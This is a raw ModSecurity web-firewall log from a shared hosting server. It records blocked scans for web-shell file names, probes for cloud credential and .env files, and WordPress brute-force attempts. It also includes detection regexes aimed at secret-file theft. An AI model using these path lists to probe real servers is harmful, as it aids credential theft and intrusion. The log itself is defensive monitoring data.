[Tue May 26 18:44:35.485368 2026] [security2:error] [pid 1025417:tid 1025637] [client 161.123.106.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWcu1HbArxonFeMXvQQHAAAAFo"]
[Tue May 26 18:44:35.683927 2026] [security2:error] [pid 1025417:tid 1025609] [client 20.195.199.65:42126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/c55cdler.php"] [unique_id "ahWcu1HbArxonFeMXvQQKQAAAD4"]
[Tue May 26 18:44:35.684023 2026] [security2:error] [pid 1025417:tid 1025609] [client 20.195.199.65:42126] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/c55cdler.php"] [unique_id "ahWcu1HbArxonFeMXvQQKQAAAD4"]
[Tue May 26 18:44:36.130778 2026] [security2:error] [pid 1025417:tid 1025441] [remote 178.156.182.155:41558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWcu1HbArxonFeMXvQQLwAAPxc"]
[Tue May 26 18:44:36.454858 2026] [security2:error] [pid 1025417:tid 1025560] [client 20.195.199.65:41268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/error_log.php"] [unique_id "ahWcvFHbArxonFeMXvQQOwAAAA0"]
[Tue May 26 18:44:36.454986 2026] [security2:error] [pid 1025417:tid 1025560] [client 20.195.199.65:41268] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/error_log.php"] [unique_id "ahWcvFHbArxonFeMXvQQOwAAAA0"]
[Tue May 26 18:44:37.681064 2026] [security2:error] [pid 1025417:tid 1025554] [client 20.195.199.65:63176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/xenon1337.php"] [unique_id "ahWcvVHbArxonFeMXvQQVgAAAAc"]
[Tue May 26 18:44:37.681168 2026] [security2:error] [pid 1025417:tid 1025554] [client 20.195.199.65:63176] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/xenon1337.php"] [unique_id "ahWcvVHbArxonFeMXvQQVgAAAAc"]
[Tue May 26 18:44:38.074787 2026] [security2:error] [pid 1025417:tid 1025599] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcvVHbArxonFeMXvQQVwAAADQ"]
[Tue May 26 18:44:38.577677 2026] [security2:error] [pid 1025417:tid 1025660] [client 20.195.199.65:41276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/alfa403.php"] [unique_id "ahWcvlHbArxonFeMXvQQcQAAAHE"]
[Tue May 26 18:44:38.577787 2026] [security2:error] [pid 1025417:tid 1025660] [client 20.195.199.65:41276] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/alfa403.php"] [unique_id "ahWcvlHbArxonFeMXvQQcQAAAHE"]
[Tue May 26 18:44:38.885911 2026] [security2:error] [pid 1025417:tid 1025448] [remote 103.117.180.182:33812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.180.117.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWcvlHbArxonFeMXvQQfgAAGR4"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 18:44:39.099633 2026] [security2:error] [pid 1025417:tid 1025446] [remote 209.42.19.17:52952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWcvlHbArxonFeMXvQQfwAAPBw"]
[Tue May 26 18:44:39.159544 2026] [security2:error] [pid 1025417:tid 1025451] [remote 121.200.216.55:34998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWcvlHbArxonFeMXvQQgQAABiE"]
[Tue May 26 18:44:39.167341 2026] [security2:error] [pid 1025417:tid 1025624] [client 123.23.165.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcvlHbArxonFeMXvQQdwAAAE0"]
[Tue May 26 18:44:39.903032 2026] [security2:error] [pid 1025417:tid 1025455] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.aws/credentials"] [unique_id "ahWcv1HbArxonFeMXvQQmgAAZiU"]
[Tue May 26 18:44:40.247344 2026] [security2:error] [pid 1025417:tid 1025548] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcv1HbArxonFeMXvQQmQAAAAE"]
[Tue May 26 18:44:40.542064 2026] [security2:error] [pid 1025417:tid 1025660] [client 20.195.199.65:47295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/test11.php"] [unique_id "ahWcwFHbArxonFeMXvQQrAAAAHE"]
[Tue May 26 18:44:40.542187 2026] [security2:error] [pid 1025417:tid 1025660] [client 20.195.199.65:47295] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/test11.php"] [unique_id "ahWcwFHbArxonFeMXvQQrAAAAHE"]
[Tue May 26 18:44:41.485024 2026] [security2:error] [pid 1025417:tid 1025572] [client 124.43.5.103:39293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcwVHbArxonFeMXvQQwgAAABk"]
[Tue May 26 18:44:41.485251 2026] [security2:error] [pid 1025417:tid 1025572] [client 124.43.5.103:39293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcwVHbArxonFeMXvQQwgAAABk"]
[Tue May 26 18:44:41.546835 2026] [security2:error] [pid 1025417:tid 1025631] [client 2a01:4f8:c0c:7179::1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWcwVHbArxonFeMXvQQwwAAVC0"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 18:44:41.901413 2026] [security2:error] [pid 1025417:tid 1025464] [remote 194.163.139.224:52568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWcwVHbArxonFeMXvQQ0wAAcC4"]
[Tue May 26 18:44:42.219067 2026] [security2:error] [pid 1025417:tid 1025470] [remote 194.163.139.224:52568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWcwlHbArxonFeMXvQQ2gAAPzQ"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:44:42.917852 2026] [security2:error] [pid 1025417:tid 1025473] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.aws/credentials.gpg"] [unique_id "ahWcwlHbArxonFeMXvQQ9gAASzc"]
[Tue May 26 18:44:42.965915 2026] [security2:error] [pid 1025417:tid 1025655] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcwlHbArxonFeMXvQQ5wAAAGw"]
[Tue May 26 18:44:43.091447 2026] [security2:error] [pid 1025417:tid 1025613] [client 20.195.199.65:39807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/koala.php"] [unique_id "ahWcw1HbArxonFeMXvQQ9wAAAEI"]
[Tue May 26 18:44:43.091591 2026] [security2:error] [pid 1025417:tid 1025613] [client 20.195.199.65:39807] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/koala.php"] [unique_id "ahWcw1HbArxonFeMXvQQ9wAAAEI"]
[Tue May 26 18:44:43.176521 2026] [security2:error] [pid 1025417:tid 1025471] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcwlHbArxonFeMXvQQ9QAAXzU"]
[Tue May 26 18:44:43.176791 2026] [security2:error] [pid 1025417:tid 1025642] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcwlHbArxonFeMXvQQ9QAAXzU"]
[Tue May 26 18:44:44.291135 2026] [security2:error] [pid 1025417:tid 1025662] [client 114.119.129.237:39049] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.athelstan.org.in"] [uri "/"] [unique_id "ahWcxFHbArxonFeMXvQRDwAAAHM"], referer: https://athelstan.org.uk/structure/provinces
[Tue May 26 18:44:44.757706 2026] [security2:error] [pid 1025417:tid 1025478] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.s3cfg"] [unique_id "ahWcxFHbArxonFeMXvQRGAAAaDw"]
[Tue May 26 18:44:45.353277 2026] [security2:error] [pid 1025417:tid 1025625] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcxFHbArxonFeMXvQRKAAAAE4"]
[Tue May 26 18:44:45.375900 2026] [security2:error] [pid 1025417:tid 1025565] [client 20.195.199.65:65244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/mac.php"] [unique_id "ahWcxVHbArxonFeMXvQRLwAAABI"]
[Tue May 26 18:44:45.375988 2026] [security2:error] [pid 1025417:tid 1025565] [client 20.195.199.65:65244] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/mac.php"] [unique_id "ahWcxVHbArxonFeMXvQRLwAAABI"]
[Tue May 26 18:44:45.722426 2026] [security2:error] [pid 1025417:tid 1025475] [remote 46.224.234.158:43148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.234.224.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcxVHbArxonFeMXvQRMAAANTk"]
[Tue May 26 18:44:46.567404 2026] [security2:error] [pid 1025417:tid 1025484] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.passwd-s3fs"] [unique_id "ahWcxlHbArxonFeMXvQRXgAAHEI"]
[Tue May 26 18:44:47.279681 2026] [security2:error] [pid 1025417:tid 1025590] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcxlHbArxonFeMXvQRaAAAACs"]
[Tue May 26 18:44:47.901193 2026] [security2:error] [pid 1025417:tid 1025618] [client 20.195.199.65:65274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/25d653587fdfd1.php"] [unique_id "ahWcx1HbArxonFeMXvQRiAAAAEc"]
[Tue May 26 18:44:47.901278 2026] [security2:error] [pid 1025417:tid 1025618] [client 20.195.199.65:65274] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/25d653587fdfd1.php"] [unique_id "ahWcx1HbArxonFeMXvQRiAAAAEc"]
[Tue May 26 18:44:48.374830 2026] [security2:error] [pid 1025417:tid 1025488] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/s3cmd.ini"] [unique_id "ahWcyFHbArxonFeMXvQRkQAAJ0Y"]
[Tue May 26 18:44:49.505252 2026] [security2:error] [pid 1025417:tid 1025598] [client 20.195.199.65:44313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/wefile.php"] [unique_id "ahWcyVHbArxonFeMXvQRrwAAADM"]
[Tue May 26 18:44:49.505353 2026] [security2:error] [pid 1025417:tid 1025598] [client 20.195.199.65:44313] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/wefile.php"] [unique_id "ahWcyVHbArxonFeMXvQRrwAAADM"]
[Tue May 26 18:44:50.228823 2026] [security2:error] [pid 1025417:tid 1025499] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env"] [unique_id "ahWcylHbArxonFeMXvQRvgAABFE"]
[Tue May 26 18:44:50.331564 2026] [security2:error] [pid 1025417:tid 1025648] [client 176.65.139.232:62554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "businessclubinternational.net"] [uri "/.env"] [unique_id "ahWcylHbArxonFeMXvQRvwAAAGU"]
[Tue May 26 18:44:50.480207 2026] [security2:error] [pid 1025417:tid 1025579] [client 176.65.139.238:29576] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ecosol.plus.businessclubinternational.net"] [uri "/.env"] [unique_id "ahWcylHbArxonFeMXvQRxgAAACA"]
[Tue May 26 18:44:50.722869 2026] [security2:error] [pid 1025417:tid 1025564] [client 176.65.139.239:50440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ecosol.plus"] [uri "/.env"] [unique_id "ahWcylHbArxonFeMXvQRzgAAABE"]
[Tue May 26 18:44:50.806701 2026] [security2:error] [pid 1025417:tid 1025673] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcylHbArxonFeMXvQRwgAAAH4"]
[Tue May 26 18:44:51.280809 2026] [security2:error] [pid 1025417:tid 1025603] [client 20.195.199.65:65250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/casp3.php"] [unique_id "ahWcy1HbArxonFeMXvQR2wAAADg"]
[Tue May 26 18:44:51.280905 2026] [security2:error] [pid 1025417:tid 1025603] [client 20.195.199.65:65250] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/casp3.php"] [unique_id "ahWcy1HbArxonFeMXvQR2wAAADg"]
[Tue May 26 18:44:52.101217 2026] [security2:error] [pid 1025417:tid 1025506] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.env.backup"] [unique_id "ahWczFHbArxonFeMXvQR8gAAI1g"]
[Tue May 26 18:44:52.165062 2026] [security2:error] [pid 1025417:tid 1025581] [client 47.128.116.53:28872] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWczFHbArxonFeMXvQR9QAAACI"]
[Tue May 26 18:44:52.212545 2026] [security2:error] [pid 1025417:tid 1025632] [client 124.43.5.103:39531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWczFHbArxonFeMXvQR-AAAAFU"]
[Tue May 26 18:44:52.212666 2026] [security2:error] [pid 1025417:tid 1025632] [client 124.43.5.103:39531] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWczFHbArxonFeMXvQR-AAAAFU"]
[Tue May 26 18:44:52.350003 2026] [security2:error] [pid 1025417:tid 1025653] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcy1HbArxonFeMXvQR7wAAAGo"]
[Tue May 26 18:44:53.207447 2026] [security2:error] [pid 1025417:tid 1025606] [client 127.0.0.1:49356] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "127.0.0.1"] [uri "/cgi-sys/autoconfig.cgi"] [unique_id "ahWczVHbArxonFeMXvQSEQAAADs"]
[Tue May 26 18:44:53.207489 2026] [security2:error] [pid 1025417:tid 1025658] [client 20.195.199.65:47293] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWczVHbArxonFeMXvQSEAAAAG8"]
[Tue May 26 18:44:53.314941 2026] [security2:error] [pid 1025417:tid 1025509] [remote 123.30.233.13:37552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWczVHbArxonFeMXvQSDQAABVs"]
[Tue May 26 18:44:53.405636 2026] [security2:error] [pid 1025417:tid 1025608] [client 127.0.0.1:49366] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "127.0.0.1"] [uri "/cgi-sys/autoconfig.cgi"] [unique_id "ahWczVHbArxonFeMXvQSGQAAAD0"]
[Tue May 26 18:44:53.405704 2026] [security2:error] [pid 1025417:tid 1025614] [client 20.195.199.65:47293] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-admin/js/"] [unique_id "ahWczVHbArxonFeMXvQSGAAAAEM"]
